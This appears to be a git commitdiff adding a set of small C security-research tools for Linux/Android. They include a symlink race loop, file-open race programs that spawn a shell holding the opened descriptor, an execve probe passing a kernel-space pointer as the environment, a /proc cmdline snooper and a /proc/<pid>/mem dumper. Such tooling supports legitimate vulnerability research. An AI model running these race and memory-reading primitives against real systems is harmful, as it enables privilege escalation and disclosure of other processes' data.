--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 2) {
+ puts("invocation: ./delayedreaddir <dirpath>");
+ return 1;
+ }
+ DIR *d = opendir(argv[1]);
+ if (d == NULL) {
+ printf("error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ printf("please press the any key...\n");
+ while (getchar() != '\n');
+ struct dirent *dent;
+ while ((dent = readdir(d)) != NULL) {
+ printf("%s ", dent->d_name);
+ }
+ printf("\n");
+}
--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdio.h>
+
+extern char **environ;
+
+int main2() {
+ printf("trying to read the first char of the environment...\n");
+ puts(*environ);
+ printf("char read: %c\n", **environ);
+ return 0;
+}
+
+int main1() {
+ char *newenv[] = {(char *)0xffffffff80008000, NULL};
+ char *argv[] = { "evilenvexec", "stage2", NULL };
+ execve("/proc/self/exe", argv, newenv);
+ printf("execve fail: %s\n", strerror(errno));
+ return 1;
+}
+
+int main(int argc, char *argv[]) {
+ if (argc == 2) return main2();
+ return main1();
+}
--- /dev/null
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 4) return 1;
+
+ char *filename = argv[1];
+ char *filename_ = argv[2];
+ char *linktarget = argv[3];
+
+ while (1) {
+ link(filename_, filename);
+ unlink(filename);
+ symlink(linktarget, filename);
+ unlink(filename);
+ }
+}
--- /dev/null
+#include <stdio.h>
+
+int main(void) {
+ int n, n_;
+ scanf("%d", &n);
+ while (1) {
+ n_ = n;
+ if (scanf("%d", &n) != 1) {
+ perror("read failed");
+ return 1;
+ }
+ printf("%d\n", n-n_);
+ }
+}
--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen <folder> <fileprefix>"); exit(1); }
+
+ chdir(argv[1]);
+ DIR *dir = opendir(".");
+ int prefixlen = strlen(argv[2]);
+ while (1) {
+ struct dirent *dent;
+ while ((dent = readdir(dir)) != NULL) {
+ if (dent->d_name[0] == '.' && (dent->d_name[1] == '\0' || (dent->d_name[1] == '.' && dent->d_name[2] == '\0'))) continue;
+ if (strncmp(dent->d_name, argv[2], prefixlen) == 0) {
+ int fd = open(dent->d_name, O_RDWR);
+ if (fd == -1) {
+ printf("Saw a file (%s), but couldn't open it: %s\n", dent->d_name, strerror(errno));
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ system("/bin/sh");
+ printf("\nshell exited, resuming race\n");
+ }
+ }
+ rewinddir(dir);
+ }
+}
--- /dev/null
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen <folder> <file>"); exit(1); }
+
+ chdir(argv[1]);
+ while (1) {
+ int fd = open(argv[2], O_RDWR);
+ if (fd == -1) {
+ sched_yield();
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ execl("/system/bin/sh", "sh", NULL);
+ printf("\nshell exited, resuming race\n");
+ }
+}
--- /dev/null
+// Try to print the cmdlines of all process spawns by polling /proc.
+
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dirent.h>
+#include <stdio.h>
+
+
+static unsigned int active[65536];
+
+// assumes that *str can't be empty
+static int str_to_int(char *str) {
+ unsigned int res = 0;
+ while (1) {
+ if (*str < '0' || *str > '9') return -1;
+ res += *str - '0';
+ str++;
+ if (*str == '\0') return res;
+ res *= 10;
+ }
+}
+
+int main(int argc, char *argv[]) {
+ for (int i=0; i<65536; i++) {
+ active[i] = 0;
+ }
+
+ chdir("/proc");
+ DIR *dir = opendir(".");
+ unsigned int cycle = 2, lastcycle;
+ while (1) {
+ lastcycle = cycle-1;
+ struct dirent *dent;
+ char path[5+1+7+1];
+ while ((dent = readdir(dir)) != NULL) {
+ int name_id = str_to_int(dent->d_name);
+ if (name_id < 0 || name_id > 65535) continue;
+ if (active[name_id] != lastcycle) {
+ sprintf(path, "%s/cmdline", dent->d_name);
+ int fd = open(path, O_RDONLY);
+ if (fd != -1) {
+ char cmdline[65536];
+ int cmdline_len = read(fd, cmdline, 65536);
+ if (cmdline_len != -1) {
+ write(1, cmdline, cmdline_len);
+ write(1, "\n", 1);
+ }
+ close(fd);
+ }
+ }
+ active[name_id] = cycle;
+ }
+ rewinddir(dir);
+ cycle++;
+ }
+}
--- /dev/null
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdlib.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) {
+ fputs("invocation: ./viewmem /proc/<pid>/mem <addr>\n", stderr);
+ return 1;
+ }
+ char *end;
+ errno = 0;
+ unsigned long long addr = strtoull(argv[2], &end, 0);
+ if (errno != 0 || *end != 0) {
+ fputs("invalid addr\n", stderr);
+ return 1;
+ }
+ int fd = open(argv[1], O_RDWR);
+ if (fd == -1) {
+ fprintf(stderr, "error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ fprintf(stderr, "please press the any key...\n");
+ fd = openat(fd, "", 0, O_RDWR);
+ while (getchar() != '\n');
+ fprintf(stderr, "trying to dump...");
+ errno = 0;
+ lseek(fd, addr, SEEK_SET);
+ if (errno != 0) {
+ fprintf(stderr, "lseek() failed: %s\n", strerror(errno));
+ return 1;
+ }
+ char buf[4096]; // nothing interesting has a different pagesize anyway
+ int i=0;
+ while (read(fd, buf, 4096) == 4096) {
+ write(1, buf, 4096);
+ i++;
+ }
+ fprintf(stderr, "read %i pages\n", i);
+ return 0;
+}
--- /dev/null
+/*
+ * Execute a program with weird args (e.g. an argv[0] value that doesn't match
+ * the filename or argc=0).
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <string.h>
+
+int main(int argc, char *argv[]) {
+ execvp(argv[1], argv+2);
+ fprintf(stderr, "error: %s\n", strerror(errno));
+ return 1;
+}
\ No newline at end of file
projects / tools.git / commitdiff